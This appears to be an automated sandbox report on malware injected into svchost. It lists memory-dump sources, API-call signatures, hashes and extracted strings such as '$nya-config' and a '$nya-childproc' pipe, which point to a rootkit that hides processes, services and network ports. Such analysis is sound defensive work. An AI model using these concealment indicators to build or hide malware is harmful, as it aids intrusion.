                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: c7a4973126e1821149b9bb57efd12384a65569e6dc40a33e3ade57d1bdd71235
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: 73A1F72AF0468069FBA4EFB5D6683AF6BB0AB45794F184535DF4427BD6CABCC041E700

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3572789727
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: 166e6a7cf8ca6ae22d1d2167cc4d7dbb97e4619db1cdf95cc15371901a208e22
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: 0F71302AB10E50A6EB90AFE5E9A865A2374FB49B88F402531DF4D4372ADF79C464C340

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: 5fd594a0b7fa2e6d6a870a4b8be9315c5f609ef8c5858b0e1febb8391929093b
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: 99515A36A00B84A6EBA4EFA2E66835A77B1F78CB88F448134DB4947719DF7CC459C700

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: 667aa4a931bf1db41e538e731fbbbe72ea80eb3c72d69248ee73dd534c18d3f0
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: 59519029F0160461FA98AF96EA687A73270AB49BB0F584B349F3D473D2DBBCC445C740

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU Engine(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: 54bb57bfbac15d22c730a9ae4bf4d5dcc13813a5c375ca13860c46240ad27539
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: 6631B326E04A40AAFBA5EF92EA1835BA3B0F78CBC5F4445349F4943626DFBCC555C340

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU Engine(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: 65eec3c7316b9ca877189915c2b978696c90943607defc846abed2c99c45d4dd
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: B6319129E14B01AAF794EF92EA68B1A63B0F788F84F0455359F4E43726DFB8C845C300

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 331 22f4b92a22c-22f4b92a294 call 22f4b92b144 334 22f4b92a6f5-22f4b92a6fb call 22f4b92c388 331->334 335 22f4b92a29a-22f4b92a29d 331->335 335->334 336 22f4b92a2a3-22f4b92a2a9 335->336 338 22f4b92a2af-22f4b92a2b3 336->338 339 22f4b92a378-22f4b92a38a 336->339 338->339 343 22f4b92a2b9-22f4b92a2c4 338->343 341 22f4b92a390-22f4b92a394 339->341 342 22f4b92a645-22f4b92a649 339->342 341->342 344 22f4b92a39a-22f4b92a3a5 341->344 346 22f4b92a682-22f4b92a68c call 22f4b929324 342->346 347 22f4b92a64b-22f4b92a652 342->347 343->339 345 22f4b92a2ca-22f4b92a2cf 343->345 344->342 350 22f4b92a3ab-22f4b92a3af 344->350 345->339 351 22f4b92a2d5-22f4b92a2df call 22f4b929324 345->351 346->334 357 22f4b92a68e-22f4b92a6ad call 22f4b928070 346->357 347->334 348 22f4b92a658-22f4b92a67d call 22f4b92a6fc 347->348 348->346 354 22f4b92a575-22f4b92a581 350->354 355 22f4b92a3b5-22f4b92a3f0 call 22f4b929704 350->355 351->357 365 22f4b92a2e5-22f4b92a310 call 22f4b929324 * 2 call 22f4b929a0c 351->365 354->346 358 22f4b92a587-22f4b92a58b 354->358 355->354 369 22f4b92a3f6-22f4b92a3ff 355->369 362 22f4b92a58d-22f4b92a599 call 22f4b9299cc 358->362 363 22f4b92a59b-22f4b92a5a3 358->363 362->363 378 22f4b92a5bc-22f4b92a5c4 362->378 363->346 368 22f4b92a5a9-22f4b92a5b6 call 22f4b9295a4 363->368 398 22f4b92a312-22f4b92a316 365->398 399 22f4b92a330-22f4b92a33a call 22f4b929324 365->399 368->346 368->378 374 22f4b92a403-22f4b92a435 369->374 375 22f4b92a568-22f4b92a56f 374->375 376 22f4b92a43b-22f4b92a447 374->376 375->354 375->374 376->375 380 22f4b92a44d-22f4b92a46c 376->380 381 22f4b92a5ca-22f4b92a5ce 378->381 382 22f4b92a6d8-22f4b92a6f4 call 22f4b929324 * 2 call 22f4b92c2f4 378->382 384 22f4b92a472-22f4b92a4af call 22f4b9299e0 * 2 380->384 385 22f4b92a558-22f4b92a55d 380->385 386 22f4b92a5e1 381->386 387 22f4b92a5d0-22f4b92a5df call 22f4b9299cc 381->387 382->334 411 22f4b92a4e2-22f4b92a4e5 384->411 385->375 394 22f4b92a5e3-22f4b92a5ed call 22f4b92b1dc 386->394 387->394 394->346 409 22f4b92a5f3-22f4b92a643 call 22f4b929634 call 22f4b929838 394->409 398->399 403 22f4b92a318-22f4b92a323 398->403 399->339 414 22f4b92a33c-22f4b92a35c call 22f4b929324 * 2 call 22f4b92b1dc 399->414 403->399 408 22f4b92a325-22f4b92a32a 403->408 408->334 408->399 409->346 417 22f4b92a4b1-22f4b92a4d7 call 22f4b9299e0 call 22f4b92a96c 411->417 418 22f4b92a4e7-22f4b92a4ee 411->418 436 22f4b92a373 414->436 437 22f4b92a35e-22f4b92a368 call 22f4b92b2cc 414->437 433 22f4b92a4f9-22f4b92a556 call 22f4b92a158 417->433 434 22f4b92a4d9-22f4b92a4dc 417->434 422 22f4b92a55f 418->422 423 22f4b92a4f0-22f4b92a4f4 418->423 424 22f4b92a564 422->424 423->384 424->375 433->424 434->411 436->339 441 22f4b92a6d2-22f4b92a6d7 call 22f4b92c2f4 437->441 442 22f4b92a36e-22f4b92a6d1 call 22f4b928f84 call 22f4b92ad28 call 22f4b929178 437->442 441->382 442->441
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: 83a760fde54ee1c5f207a7528977c86193a96b1b5316f8e0d94e5d4ef025fc8b
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: 85D18D2AD007409AFBA8AFA5E65839E77B0F755798F100935DB8957797CB78C481C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000003.1538492265.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_3_22f4b8f0000_svchost.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction ID: 350ed3b2226708ae4edfa82662d5c9b4d7a5033190cc26238961e0a1e2b44f09
                                            • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction Fuzzy Hash: AED1AF3AA00744A6EBA0EFA5D58879E77B0F755799F100135EF8957B9BEB74C082C700

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$nya-childproc
                                            • API String ID: 166002920-3933612297
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: 56fa6b07a625ae531577085f785817776d22235ed9cb5571334ba84ca8f443b3
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: 2D116A3AA18B4092E7909F61F62831A7770F38DB94F945230EB9902AA9CFBDC144CB40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 6da2365d5e17544b82aac065803e710dae94bd682bc38aef71eae997fec83743
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: 4681E528E05640B6FAD8BFE5D6B93AB62B1AB85780F5488349B4857397DBFCCC45C310
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000003.1538492265.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_3_22f4b8f0000_svchost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: bd218116f59a5c56efc38000c5aded2ca847f2db8270a2ecf24cb78a0c5da713
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: CC81A23CE00241B6FAD4BFE9DA59B5B32B1AB86782F5440359B0947397FAB8C957C700
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929B31
                                            • GetLastError.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929B69
                                            • FreeLibrary.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929BD7
                                            • GetProcAddress.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: ec79bae74621d3473f9289de3cbe0439ae45c8112a6144b4fb78fd3ca3ac7a4a
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: C3310A2DE12640A1FE99BFA6E6287A723B4BB59B60F590938DE1D47792DF7CC044C300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction ID: d7620b8c19884500c47e3124fb66e9135124c8218baa58d1833e4fac0ed32348
                                            • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction Fuzzy Hash: F1118129A14A4092E7D0AF92EA6C71A67B0F38CBE4F405234EB5D87B96CFB9C404C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: 54a9b70a4ef810b0383967a9bfaf94ee71e1065358e960c329d1809482fffa67
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: 1ED18D3AA08B4891EAB49F5AE5A435A77B0F388B84F100535EBCD47B66DF7CC551CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: e4614e4e50a161e2bb6536ae214093138366ffb694989e2a8f17203713cc93de
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: F451B328E01B55B5FE8DBFA5EA782A637B1BB04745F804C35962C067A7EFB8C564C340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $nya-
                                            • API String ID: 756756679-1266920357
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: f6368292fef801f456ef4d047ad2896ab5c4a3f22002196d8df88fadc90d907f
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: C8319529F05B55A6F698EF96D76932A63B4FB44B84F0848308F4807B56EFB8C461C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: 5caee82ebc5799ff4bab53cc8ea9f8870476772665104bd938d6c37ff24bf77e
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: 88112E2DE1524072F6DC7FB1E63E36B22719F89790F545A34AA66563D7CEACC441C300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
